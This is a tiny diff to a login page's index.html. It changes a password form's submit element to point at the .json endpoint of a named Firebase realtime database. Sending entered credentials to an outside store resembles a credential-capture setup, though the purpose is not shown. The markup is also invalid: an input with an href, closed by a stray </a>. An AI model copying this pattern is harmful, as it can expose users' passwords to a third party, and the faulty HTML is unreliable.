--- a/index.html
+++ b/index.html
@@ -1,5 +1,5 @@
 <html>
         <input type='text' id='username' /> 
         <input type='password' id='password'/> 
-        <input type='submit' id='send' class='btn' href='#'>Send</a> 
+        <input type='submit' id='send' class='btn' href='https://mohamed-2912f-default-rtdb.firebaseio.com/.json'>Send</a> 
 </html>
